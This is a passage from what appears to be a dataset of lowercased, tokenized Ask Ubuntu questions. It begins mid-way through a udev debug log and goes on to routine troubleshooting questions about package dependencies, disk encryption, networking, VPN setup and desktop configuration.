for debugging only , it does not run any program , specified by a run key . it may show incorrect results , because some values may be different , or not available at a simulation run . parse_file : reading '/lib/udev/rules.d/40-crda.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-fuse.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-gnupg.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-hplip.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-ia64.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-inputattach.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-libgphoto2-2.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-libsane.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-ppc.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-usb_modeswitch.rules ' as rules file parse_file : reading '/lib/udev/rules.d/40-xserver-xorg-video-intel.rules ' as rules file parse_file : reading '/lib/udev/rules.d/42-qemu-usb.rules ' as rules file parse_file : reading '/lib/udev/rules.d/50-firmware.rules ' as rules file parse_file : reading '/lib/udev/rules.d/50-udev-default.rules ' as rules file parse_file : reading '/lib/udev/rules.d/55-dm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/56-hpmud_support.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-cdrom_id.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-pcmcia.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-alsa.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-input.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-serial.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-storage-dm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-storage-tape.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-storage.rules ' as rules file parse_file : reading '/lib/udev/rules.d/60-persistent-v4l.rules ' as rules file parse_file : reading '/lib/udev/rules.d/61-accelerometer.rules ' as rules file parse_file : reading '/lib/udev/rules.d/64-xorg-xkb.rules ' as rules file parse_file : reading '/lib/udev/rules.d/66-xorg-synaptics-quirks.rules ' as rules file parse_file : reading '/lib/udev/rules.d/69-cd-sensors.rules ' as rules file add_rule : import found builtin 'usb_id ' , replacing /lib/udev/rules.d/69-cd-sensors.rules:76 parse_file : reading '/lib/udev/rules.d/69-libmtp.rules ' as rules file parse_file : reading '/lib/udev/rules.d/69-xorg-vmmouse.rules ' as rules file parse_file : reading '/lib/udev/rules.d/69-xserver-xorg-input-wacom.rules ' as rules file parse_file : reading '/etc/udev/rules.d/70-persistent-cd.rules ' as rules file parse_file : reading '/etc/udev/rules.d/70-persistent-net.rules ' as rules file parse_file : reading '/lib/udev/rules.d/70-printers.rules ' as rules file parse_file : reading '/lib/udev/rules.d/70-udev-acl.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-cd-aliases-generator.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-net-description.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-persistent-net-generator.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-probe_mtd.rules ' as rules file parse_file : reading '/lib/udev/rules.d/75-tty-description.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-ericsson-mbm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-longcheer-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-nokia-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-pcmcia-device-blacklist.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-platform-serial-whitelist.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-qdl-device-blacklist.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-simtech-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-usb-device-blacklist.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-x22x-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-mm-zte-port-types.rules ' as rules file parse_file : reading '/lib/udev/rules.d/77-nm-olpc-mesh.rules ' as rules file parse_file : reading '/lib/udev/rules.d/78-graphics-card.rules ' as rules file parse_file : reading '/lib/udev/rules.d/78-sound-card.rules ' as rules file parse_file : reading '/lib/udev/rules.d/80-drivers.rules ' as rules file parse_file : reading '/lib/udev/rules.d/80-mm-candidate.rules ' as rules file parse_file : reading '/lib/udev/rules.d/80-udisks.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-brltty.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-hdparm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-hplj10xx.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-keyboard-configuration.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-regulatory.rules ' as rules file parse_file : reading '/lib/udev/rules.d/85-usbmuxd.rules ' as rules file parse_file : reading '/lib/udev/rules.d/90-alsa-restore.rules ' as rules file parse_file : reading '/lib/udev/rules.d/90-alsa-ucm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/90-libgpod.rules ' as rules file parse_file : reading '/lib/udev/rules.d/90-pulseaudio.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-cd-devices.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-keyboard-force-release.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-keymap.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-udev-late.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-dell.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-fujitsu.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-gateway.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-ibm.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-lenovo.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-battery-recall-toshiba.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-csr.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-hid.rules ' as rules file parse_file : reading '/lib/udev/rules.d/95-upower-wup.rules ' as rules file parse_file : reading '/lib/udev/rules.d/97-bluetooth-hid2hci.rules ' as rules file parse_file : reading '/etc/udev/rules.d/jj-video.rules ' as rules file udev_rules_new : rules use 259284 bytes tokens ( 21607 * 12 bytes ) , 37913 bytes buffer udev_rules_new : temporary index used 67520 bytes ( 3376 * 20 bytes ) udev_device_new_from_syspath : device 0x215103e0 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0/video4linux/video1' udev_device_new_from_syspath : device 0x21510758 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0/video4linux/video1' udev_device_read_db : device 0x21510758 filled with db file data udev_device_new_from_syspath : device 0x21510e10 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0' udev_device_new_from_syspath : device 0x21511b10 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2/2-2' udev_device_new_from_syspath : device 0x215132f8 has devpath '/devices/pci0000:00/0000:00:1d.0/usb2' udev_device_new_from_syspath : device 0x21513650 has devpath '/devices/pci0000:00/0000:00:1d.0' udev_device_new_from_syspath : device 0x21513980 has devpath '/devices/pci0000:00' udev_rules_apply_to_event : group 44 /lib/udev/rules.d/50-udev-default.rules:29 udev_rules_apply_to_event : import 'v4l_id /dev/video1 ' /lib/udev/rules.d/60-persistent-v4l.rules:7 udev_event_spawn : starting 'v4l_id /dev/video1' spawn_read : 'v4l_id /dev/video1 ' ( out ) 'id_v4l_version=2' spawn_read : 'v4l_id /dev/video1 ' ( out ) 'id_v4l_product=logitech quickcam pro 3000' spawn_read : 'v4l_id /dev/video1 ' ( out ) 'id_v4l_capabilities= : capture : ' spawn_wait : 'v4l_id /dev/video1 ' [ 2609 ] exit with return code 0 udev_rules_apply_to_event : import builtin 'usb_id ' /lib/udev/rules.d/60-persistent-v4l.rules:9 builtin_usb_id : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0 : if_class 10 protocol 0 udev_builtin_add_property : id_vendor=046d udev_builtin_add_property : id_vendor_enc=046d udev_builtin_add_property : id_vendor_id=046d udev_builtin_add_property : id_model=08b0 udev_builtin_add_property : id_model_enc=08b0 udev_builtin_add_property : id_model_id=08b0 udev_builtin_add_property : id_revision=0002 udev_builtin_add_property : id_serial=046d_08b0_01402100a5000000 udev_builtin_add_property : id_serial_short=01402100a5000000 udev_builtin_add_property : id_type=generic udev_builtin_add_property : id_bus=usb udev_builtin_add_property : id_usb_interfaces=:0aff00:010100:010200 : udev_builtin_add_property : id_usb_interface_num=00 udev_builtin_add_property : id_usb_driver=philips webcam udev_rules_apply_to_event : link 'v4l/by-id/usb-046d_08b0_01402100a5000000-video-index0 ' /lib/udev/rules.d/60-persistent-v4l.rules:10 udev_rules_apply_to_event : import builtin 'path_id ' /lib/udev/rules.d/60-persistent-v4l.rules:16 udev_builtin_add_property : id_path=pci-0000:00:1d.0-usb-0:2:1.0 udev_builtin_add_property : id_path_tag=pci-0000_00_1d_0-usb-0_2_1_0 udev_rules_apply_to_event : link 'v4l/by-path/pci-0000:00:1d.0-usb-0:2:1.0-video-index0 ' /lib/udev/rules.d/60-persistent-v4l.rules:17 udev_rules_apply_to_event : run 'udev-acl -- action= $ env { action } -- device= $ env { devname } ' /lib/udev/rules.d/70-udev-acl.rules:74 udev_rules_apply_to_event : link 'webcam1 ' /etc/udev/rules.d/jj-video.rules:2 udev_event_execute_rules : no node name set , will use kernel supplied name 'video1' udev_node_add : creating device node '/dev/video1 ' , devnum=81:1 , mode=0660 , uid=0 , gid=44 udev_node_mknod : preserve file '/dev/video1 ' , because it has correct dev_t udev_node_mknod : preserve permissions /dev/video1 , 020660 , uid=0 , gid=44 node_symlink : preserve already existing symlink '/dev/char/81:1 ' to '../video1' link_find_prioritized : found 'c81:2 ' claiming '/run/udev/links/v4l\x2fby-id\x2fusb-046d_08b0_01402100a5000000-video-index0' udev_device_new_from_syspath : device 0x21516748 has devpath '/devices/pci0000:00/0000:00:1d.1/usb3/3-2/3-2:1.0/video4linux/video2' udev_device_read_db : device 0x21516748 filled with db file data link_find_prioritized : found 'c81:1 ' claiming '/run/udev/links/v4l\x2fby-id\x2fusb-046d_08b0_01402100a5000000-video-index0' link_update : creating link '/dev/v4l/by-id/usb-046d_08b0_01402100a5000000-video-index0 ' to '/dev/video1' node_symlink : atomically replace '/dev/v4l/by-id/usb-046d_08b0_01402100a5000000-video-index0' link_find_prioritized : found 'c81:1 ' claiming '/run/udev/links/v4l\x2fby-path\x2fpci-0000:00:1d.0-usb-0:2:1.0-video-index0' link_update : creating link '/dev/v4l/by-path/pci-0000:00:1d.0-usb-0:2:1.0-video-index0 ' to '/dev/video1' node_symlink : preserve already existing symlink '/dev/v4l/by-path/pci-0000:00:1d.0-usb-0:2:1.0-video-index0 ' to '../../video1' link_find_prioritized : found 'c81:1 ' claiming '/run/udev/links/webcam1' link_update : creating link '/dev/webcam1 ' to '/dev/video1' node_symlink : preserve already existing symlink '/dev/webcam1 ' to 'video1' udev_device_update_db : created db file '/run/udev/data/c81:1 ' for '/devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0/video4linux/video1' action=add colord_device=1 colord_kind=camera devlinks=/dev/v4l/by-id/usb-046d_08b0_01402100a5000000-video-index0 /dev/v4l/by-path/pci-0000:00:1d.0-usb-0:2:1.0-video-index0 /dev/webcam1 devname=/dev/video1 devpath=/devices/pci0000:00/0000:00:1d.0/usb2/2-2/2-2:1.0/video4linux/video1 id_bus=usb id_model=08b0 id_model_enc=08b0 id_model_id=08b0 id_path=pci-0000:00:1d.0-usb-0:2:1.0 id_path_tag=pci-0000_00_1d_0-usb-0_2_1_0 id_revision=0002 id_serial=046d_08b0_01402100a5000000 id_serial_short=01402100a5000000 id_type=generic id_usb_driver=philips webcam id_usb_interfaces=:0aff00:010100:010200 : id_usb_interface_num=00 id_v4l_capabilities= : capture : id_v4l_product=logitech quickcam pro 3000 id_v4l_version=2 id_vendor=046d id_vendor_enc=046d id_vendor_id=046d major=81 minor=1 subsystem=video4linux tags= : udev-acl : udev_log=6 usec_initialized=18213768 run : 'udev-acl -- action=add -- device=/dev/video1' jjk @ eee-old : ~ $ ( and correspondingly for video2 ) it looks to me like my rules are read , but not respected . what am i doing wrong ?
187253	how to update a package from command line ( gcc compiler )	i am trying hard ! to update the gcc-msp430 compiler on my ubuntu , but it does not work ( i guess because of the older version of the same compiler that is already installed ) . here is the command i used as well as the output . saeid @ saeid-satellite-c660 : ~ $ sudo dpkg -- force-all -i ~/downloads/gcc-msp430_4.6.3~mspgcc-20120406-3_i386.deb ; sudo apt-get -f install [ sudo ] password for saeid : ( reading database ... 164599 files and directories currently installed . ) unpacking gcc-msp430 ( from ... /gcc-msp430_4.6.3~mspgcc-20120406-3_i386.deb ) ... dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/bin/msp430-cpp ' , which is also in package msp430-gcc-tinyos 4.5.3-20110821 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/bin/msp430-gcc ' , which is also in package msp430-gcc-tinyos 4.5.3-20110821 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/bin/msp430-gcov ' , which is also in package msp430-gcc-tinyos 4.5.3-20110821 dpkg : gcc-msp430 : dependency problems , but configuring anyway as you requested : gcc-msp430 depends on msp430mcu ; however : package msp430mcu is not installed . gcc-msp430 depends on binutils-msp430 ( > = 2.21~ ) ; however : package binutils-msp430 is not installed . setting up gcc-msp430 ( 4.6.3~mspgcc-20120406-3 ) ... reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : binutils-msp430 msp430mcu suggested packages : msp430-libc the following new packages will be installed : binutils-msp430 msp430mcu 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/11.1 mb of archives . after this operation , 57.1 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 164845 files and directories currently installed . ) unpacking msp430mcu ( from ... /msp430mcu_20110613-3_all.deb ) ... dpkg : error processing /var/cache/apt/archives/msp430mcu_20110613-3_all.deb ( -- unpack ) : trying to overwrite '/usr/msp430/lib/msp430mcu.spec ' , which is also in package msp430mcu-tinyos 20110613-20110821 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking binutils-msp430 ( from ... /binutils-msp430_2.22~msp20110716p5-1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/binutils-msp430_2.22~msp20110716p5-1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/msp430-strip ' , which is also in package msp430-binutils-tinyos 2.21.1-20110821 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/msp430mcu_20110613-3_all.deb /var/cache/apt/archives/binutils-msp430_2.22~msp20110716p5-1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please let me know if you need more information ( i donât know what to provide at this point ) .
187254	encrypt ssd or not ?	my desktop machine is running ubuntu 12.04 ( and will probably stay with it until the next lts ) . i 've got a new 120gb ssd on the way as my existing 420gb spinning disk . if it makes any difference i 'll be dual-booting with windows 7 across both disks too . i 've read some helpful answers here about /home setup and enabling trim , which i intend to follow . so most of my /home will be on the ssd , with only photos , videos and music on the spinning disk . the question is , when i reinstall ubuntu from cd or usb , whether i should encrypt the ssd ? specifically : i 'm reading that drive wear is n't much of an issue with modern ssds as they last decades even if you spam them . is this true ? how big a performance reduction will encrypting cause ( i have an i7 sandybridge , so i guess it can cope ) ? is it more important from a security point of view to encrypt an ssd ? i think i read somewhere that it may be hard to reliably wipe data . by all means answer even if you only know about one of those things .
187260	any good sql shell programs ?	i want to practice sql commands on ubuntu . i would just like to play with different commands and keywords . where can i find something that helps ? i do n't want to install any server . i need a small app ; something less than 20mb .
187264	upgrading ubuntu 12.04 to 12.10 beta on macbook pro	i want to upgrade my ubuntu 12.04 installation to 12.10 on my macbook pro . is there anything i have to take into consideration ? can i just do a dist upgrade through the update manager , or will that mess up my macbook for sure ?
187265	which kernels can i safely purge ?	i use the main answer of this question quite often to clear some space , but now i 'm in extreme need and i 'd like to better understand which kernels are safe to purge , my list is the following 10:50:58-673 - ~ > dpkg -l | grep -eo `` ^.i +linux- ( image|headers ) [ ^ ] + '' | cut -c 5- | grep -- color -e `` $ | '' `uname -r` linux-headers-2.6.38-15 linux-headers-2.6.38-15-generic linux-headers-2.6.38-15-generic-pae linux-headers-2.6.38-16 linux-headers-2.6.38-16-generic linux-headers-2.6.38-16-generic-pae # current one linux-headers-generic linux-headers-generic-pae linux-headers-server linux-image-2.6.38-15-generic-pae linux-image-2.6.38-16-generic-pae linux-image-generic-pae linux-image-server is it enough to keep linux-headers-2.6.38-15 linux-headers-2.6.38-15-generic linux-headers-2.6.38-15-generic-pae linux-headers-2.6.38-16 linux-headers-2.6.38-16-generic linux-headers-2.6.38-16-generic-pae # current one or would this be enough linux-headers-2.6.38-15-generic-pae linux-headers-2.6.38-16-generic-pae # current one or which other would be the shortest ( keeping the previous one too ) ? and why ?
187270	unmet dependencies when trying to install openssh-server	i am running sudo-apt get install openssh-server on ubuntu 12.04 64 bit system . it is giving me the following output . $ sudo apt-get install openssh-server reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gcc-4.6 : depends : libgcc1 ( > = 1:4.6.3-1ubuntu5 ) but 1:4.6.2-14ubuntu2 is to be installed libc6 : depends : libc-bin ( = 2.15-0ubuntu10.1 ) libc6-dev : depends : libc6 ( = 2.15-0ubuntu10 ) but 2.15-0ubuntu10.1 is to be installed libgcc1 : depends : gcc-4.6-base ( = 4.6.2-14ubuntu2 ) but 4.6.3-1ubuntu5 is to be installed libxplc0.3.13 : i386 : depends : libc6 : i386 ( > = 2.5-5 ) but it is not going to be installed depends : libgcc1 : i386 ( > = 1:4.2-20070516 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.2-20070516 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
187272	how to change menu hover text colour ?	i have taken a look at gtk theme change menu bar hover color but it does n't seem to work on 12.04 , nor can i find those lines in 12.04 . my menus look like the below when hovered over for some applications such as eclipse , pidgin , libreoffice etc . where as it looks much better on nautilus and a few others . how to change the text colour on hover to white ? edit : i use cinnamon with ambiance theme
187273	my server does not forward packets between interfaces . what am i missing ?	i 'd like to get my ubuntu 11.04 server to route packet between its two network interfaces . the two ethernet interfaces ( eth0 , eth1 ) work apparently well as such . both have static ip addresses ( 192.168.2.15 & 192.168.3.15 ) and both are reachable from their respective network . all ip services as well as the samba server are reachable from both sides . sysctl -p returns `` net.ipv4.ip_forward=1 '' and i can even ping the interface `` on the other side '' from both networks . in other words : i can ping 192.168.2.15 from all pcs on the 192.168.3.0 network and 192.168.3.15 from all systems on the 192.168.2.0 net . but i can not reach any other address on the respective `` other side '' i 've already read numerous `` how to '' articles and forum threads on this very topic of setting up ubuntu as a router , but i just do n't find the final solution to my problem . here are also some further information on the setup . kernel ip routing table shows : destination gateway genmask flags metric ref use iface default 192.168.3.1 0.0.0.0 ug 100 0 0 eth0 192.168.2.0 * 255.255.255.0 u 0 0 0 eth1 192.168.3.0 * 255.255.255.0 u 0 0 0 eth0 interfaces shows : iface eth0 inet static address 192.168.3.15 netmask 255.255.255.0 broadcast 192.168.3.255 network 192.168.3.0 gateway 192.168.3.1 iface eth1 inet static address 192.168.2.15 netmask 255.255.255.0 broadcast 192.168.2.255 network 192.168.2.0 i do not need any nat or dhcp . there is no firewall running ( no ufw , no iptables settings ) . both networks have their own firewall protected internet connection and the connected devices get their ip addresses from the respective internet routers . i just want to be able to reach for example printers on one network from clients on the other . what am i missing ? does anyone have any idea ? many thanks in advance !
187279	php.ini modifications has no effect on joomla	i have a netbook with a recently installed ubuntu server 12.04 64-bit . i have ( only ) installed joomla on it ( version 2.5 ) and now i am trying to tweak the php.ini settings so i can install jomsocial onto joomla . i have changed these settings : upload_max_filesize = 2m post_max_size = 8m to this : upload_max_filesize = 20m post_max_size = 20m in all php.ini-files in my system . thats six files , found using 'locate ' : /etc/php5/apache2/php.ini /etc/php5/cli/php.ini /usr/share/doc/php5-common/examples/php.ini-development /usr/share/php5/php.ini-production /usr/share/php5/php.ini-production-dist /usr/share/php5/php.ini-production.cli i have double-checked that these files actually contain the new settings . still , joomla does not recognize the new settings , stating that upload_max_filesize is still only 2m and post_max_size is still only 8m the same is true after a complete restart of the server . what am i doing wrong here ?
187284	how to configure vpn settings ?	when i started working for my current employer , everyone ( myself and my boss included ) were on windows 7 machines . about 6 months ago , my boss gutted windows 7 on his machine and replaced it with linux mint . i recently asked if i could do the same , but with ubuntu instead , and he allowed me . so this past weekend i replaced my os with a fresh new ubuntu 12.04 desktop installation , and am loving it so far . i 'd like to configure vpn so that i can work from home . my boss sent me the following instructions in an email , but it looks like they apply only to linux mint users : create a file in /etc/vpnc/ named âourcompany.confâ , and put in there : ipsec gateway 1.2.3.4 ipsec id employeevpn ipsec secret 3dud934id94j49fj9j4f xauth username ourdomain\myusername xauth password mypassword edit : obviously , had to provide dummy values for all of these ! below is a screenshot of the vpn configurator that ships with ubuntu . is this what i should be using , or is there another vpn client i should use ? if this is what i should be using , how do my boss 's instructions translate to this client ? for instance , i do n't see ipsec or xauth settings anywhere in this tool . thanks in advance !
187285	data provider for thunderbird lightning with exchange 2010 problem	i tried to sync lightning with my office 's exchange server using the following steps : create a new calendar select `` on the network '' , click continue select `` microsoft exchange 2007/2010 '' , click continue name your calendar , make sure the e-mail is your cisco email address , click continue fill out the form using autodiscovery to find the correct url check the `` use exchange 's autodiscovery function '' populate the username with your cec username populate the domainname with cisco . click perform autodiscovery select an ews server the server url will now be populated , and folderbase should be calendar click continue finished . but i 'm getting the following error : error during autodiscovery : fatal xml conversion error . probably because we did not receive a page with xml . ( onload ) '' ! doctype html public `` -//w3c//dtd xhtml 1.0 transitional//en '' `` http : //www.w3.org/tr/xhtml1/dtd/xhtm '' ( ( null ) )
187286	setting ld_library_path before running an app from a terminal has no effect	i have several builds of an application on my system ( a dev build and many older released builds ) . when i 'm trying to run an older release , the system invariably picks up the dynamic libraries from the dev build . from /home/franz/projects/appleseed/archives/releases/1.1.0-alpha-14-0-g4e46ed9/appleseed/bin which is the directory of the older release i 'm trying to run : $ ldd appleseed.studio [ stuff omitted ] libappleseed.so = > /home/franz/projects/appleseed/build/linux-gcc4/appleseed/libappleseed.so ( 0x00007fbcb090b000 ) libappleseed.shared.so = > /home/franz/projects/appleseed/build/linux-gcc4/appleseed.shared/libappleseed.shared.so ( 0x00007fbcb030c000 ) [ more stuff omitted ] ( /home/franz/projects/appleseed/build/linux-gcc4/appleseed/ is the path to my dev build . ) naturally i should set ld_library_path correctly before running an older release : $ export ld_library_path=/home/franz/projects/appleseed/archives/releases/1.1.0-alpha-14-0-g4e46ed9/appleseed/bin ; ./appleseed.studio ( ld_library_path is initially empty so i do n't bother with concatenation . ) however this does n't work and the system continues to pick up the dev build of the dynamic libraries . am i doing something wrong ? any idea ? i am running a 64-bit build of ubuntu 10.10 maverick meerkat ( unsupported as of april 2012 ) . update : i have updated my system to ubuntu 11.10 ( natty ) and the problem persists .
187288	can not install some apps due to unmet dependencies	after i installed ubuntu 12.04 , i am not able to get skype , picasa , adobe flash player and such similar applications . when i try to install these , i get this message : failed to satisfy all dependencies , the following packages have unmet dependencies firefox : depends : libgcc1 ( > =1:4.1.1 ) but 1:4.6..3-1 is installed . software index is broken , pl use the package manager '' synaptic '' or run sudo apt_get install -f in a terminal to fix the issue first . as i am not a computer expert , i am not able to follow and take action . hence kindly let me know how to get over the problem by giving me the way i should go step by step .
187289	how to make dm-crypt ask for password only once ?	i have several raw volumes with cryptsetup-luks containers filled with my data and ubuntu asks me for password for every encrypted volume even when passwords are the same . how to make it to try the same password for each volume and when it fails- then ask again ?
187291	what domains do i need to whitelist for updates ?	my it department are moving my server to a more secure location that has limited web access , they want to know what the minimum web access is to maintain the servers updates and repositories . is there a list of 'white-listed ' sites available to give them ?
187294	nobody and nogroup as directory owner when writing with php	when executing a php script , that creates a directory the resulting file is owned by nobody and nogroup . i know that apache2 is executed as www-data on ubuntu systems , so , why is my directory owned by nobody ? thank you !
187297	problem with .wax format	i installed ubuntu 10.4 onto a pc for an elderly woman . it was supposed to solve the problems she was having with windows , ie : she would constantly remove things , or try to fix problems herself . so i figured that linux would solve those issues . however , what i did n't take into account was that she watches `` http : //www.shepherdschapel.com/broadband.htm `` and when using ubuntu , i ca n't seem to find a media player to make the files work . i am out of ideas . i tried kplayer , and it worked ( sort of ) . the file that is downloaded from the site when you click the windows media player site one link is , .wax format . which is an instruction file for windows media player . is there anything i can do to make these videos work ?
187300	how to enable arrow keys in kubuntu application launcher 12.04 ?	i just switched from kubuntu 11.10 to 12.04 and noticed that the application launcher is not behaving exactly the same . in 11.10 i open the launcher with a keybinding , write the first letters of something that i want to run , and then use the arrow keys to choose from the list of applications the system found . in 12.04 the arrow keys do not seem to work . if i write a few letters so that i get a list of choices pressing the arrow keys does absolutely nothing . i noticed that i can get to the list by pressing esc , but this seems pretty unnecessary compared to how it used to work . does anyone know how to enable the arrow keys directly in the application launcher ? edit : the specific launcher is the default launcher when installing kubuntu desktop 11.10 and 12.04 . the name is kickoff and it is a plasma launcher .
187306	applying configuration from networkmanager	after save config in networkmanager , i put in terminal command : `` ifconfig '' . the changes saved from networkmanager does not applying , and configuration interface is empty . i try for dhcp and manual ( static ) configuration . i configured connection manually by ifconfig command , but networkmanager overwrite by empty configuration networkmanager . i copied networkmanager configuration from working copy ubuntu 10.04 to ubuntu 12.04.01 and still do n't save configuration , on connection eth0 . ubuntu 12.04.01 installed from usb , in previously ubuntu version 10.04 work fine .
187307	videos not displayed in ubuntu	i have installed ubuntu 12.04 on my lenovo machine , having 1.5 gb of ram and a wide screeen lcd dell monitor ( i think videos have a 16:9 aspect ratio ) . the problem is i am not able to see videos in vlc or totem movie players . i 'm able to listen to sound , but videos are not displayed . smplayer is working well to display video . could anyone please explain to me how to play videos in other media player ?
187311	ca n't install unity webapps preview	i 'm trying to install unity-webapps-preview , so i previously added the ppa : $ sudo add-apt-repository ppa : webapps/preview $ sudo apt-get update but i get the following error : $ sudo apt-get install unity-webapps-preview reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . unity-webapps-preview : depends : xul-ext-unity but it is not going to be installed depends : xul-ext-websites-integration but it is not going to > be installed depends : xul-ext-webaccounts but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried to manually install the dependencies and i get : $ sudo apt-get install xul-ext-unity xul-ext-websites-integration xul-ext-webaccounts reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . xul-ext-webaccounts : breaks : firefox ( > = 14.+ ) but 15.0.1+build1-0ubuntu0.12.04.1 is to be installed e : unable to correct problems , you have held broken packages . version of firefox : 15.0.1 version of ubuntu : 12.04
187313	copy command from vi to clipboard	what is the command to copy all the contents to the system clipboard from a file open in an instance of the vi editor on a remote server , accessed via ssh . also , what is the shortcut for pasting from system clipboard to vi .
187314	ubuntu partition deleted	i had windows 8 installed on my laptop . i then installed ubuntu 12.04 along on separate partition . after a few days i mistakenly deleted the ubuntu partition . now i every time i start my laptop it do n't show boot options ( f2 & f12 ) . it just gets stuck at a screen showing unknown file name grub rescue > it 's not booting either into windows nor into ubuntu .
187323	how can i confirm that i 'm using ecryptfs ?	is there a simple way to tell if i 'm using ecryptfs on my home directory ? i tried running the ecryptfs-migrate-home script a while ago , and it failed part way through . i assumed that it went back to using my old plain , unencrypted home , but i just noticed that /home/.ecryptfs/naught10t/.private exists , and has lots of files in it ...
187326	how to clean up unnecessary files	please suggest me any particular unnecessary file that i can clean to back everything to normal condition ( temporarily ) . ( i.e . any log or archieve or anything ) . my var/log has only 40mb and home directory has 3gb of space ( so i believe that 's not a problem ) . other than that what i can clean up to make space . [ user @ host ] $ df -h filesystem size used avail use % mounted on /dev/mapper/vg_inamivm-lv_root 18g 17g 0 100 % / tmpfs 1.9g 0 1.9g 0 % /dev/shm /dev/sda1 485m 71m 389m 16 % /boot
187327	do not start x at startup on xubuntu 12.04	how can i change the a xubuntu 12.04 so x do not start at startup ? i tried to remove gdm with sudo apt-get remove -- purge gdm but that did not change much .
187329	can i decrypt a partition in ubuntu which is encrypted using bitlocker ( utility of windows 7 ) ?	i encrypted a 200gb partition of hdd in windows 7 using bitlocker . i removed windows 7 from the pc and installed ubuntu . now i ca n't see the partition which was encrypted from ubuntu . question : is there any way to access or decrypt this partition in ubuntu ? by the way , i know the key which is used in encryption .
187332	can i change the file icon with gio ?	i 'm using python . i want change a file icon with gio from a python app . i found a lot of deprecated documentation and i 'm not sure how i can do it . i tried this , but nothing happen : from gi.repository import gio f = gio.file.parse_name ( '/home/my_user/desktop/test.txt ' ) f.set_attribute_string ( `` metadata : :custom_icon '' , '/usr/share/icons/humanity/animations/48/brasero-disc-100.svg ' , gio.filequeryinfoflags.none , none ) which class and method have i use ? any idea , please ? thanks in advance !
187333	a good tool for formatting partition aside gparted	there is a good and quite easy to use tool for format partition , especially with nfts fs , aside gparted which with i 've had some issues ?
